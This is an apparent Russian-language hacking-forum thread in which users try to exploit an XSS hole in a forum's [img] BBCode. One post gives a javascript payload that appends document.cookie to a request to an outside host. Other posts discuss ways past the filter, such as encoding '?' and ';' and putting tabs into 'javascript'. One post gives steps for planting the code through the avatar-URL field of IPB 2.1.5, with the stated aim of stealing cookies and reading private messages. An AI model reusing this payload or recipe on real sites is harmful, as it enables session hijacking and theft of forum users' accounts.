ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Не понял вместо
[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???

Попробал вот это
[img]j a v a s c r i p t:document.images[1].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;.jpg[/img]

и вот что мне выдал
Sorry, dynamic pages in the [IMG] tags are not allowed

вместо знака вопроса пробавл вот это %3F затем ? и это &#63

Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
" пробел ; ' + ?
возможно еще [ ]

Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)

Хмм.. Ну никак не удаётся протащить ? и ;

там хэши наскоко помню соленые так что толку от xss ...

Почитать внутренние форумы и личные мессаги. Ещё поиграться.

Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов [img] и [/img]

ПС просьба репу добавлять CinerX, а не _CinerX

Для Ipb 2.1.5:
Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

ПС репу поднимаем CinerX, а не _CinerX

Sorry, that is not a valid file extension

У меня не получаеться ничего (((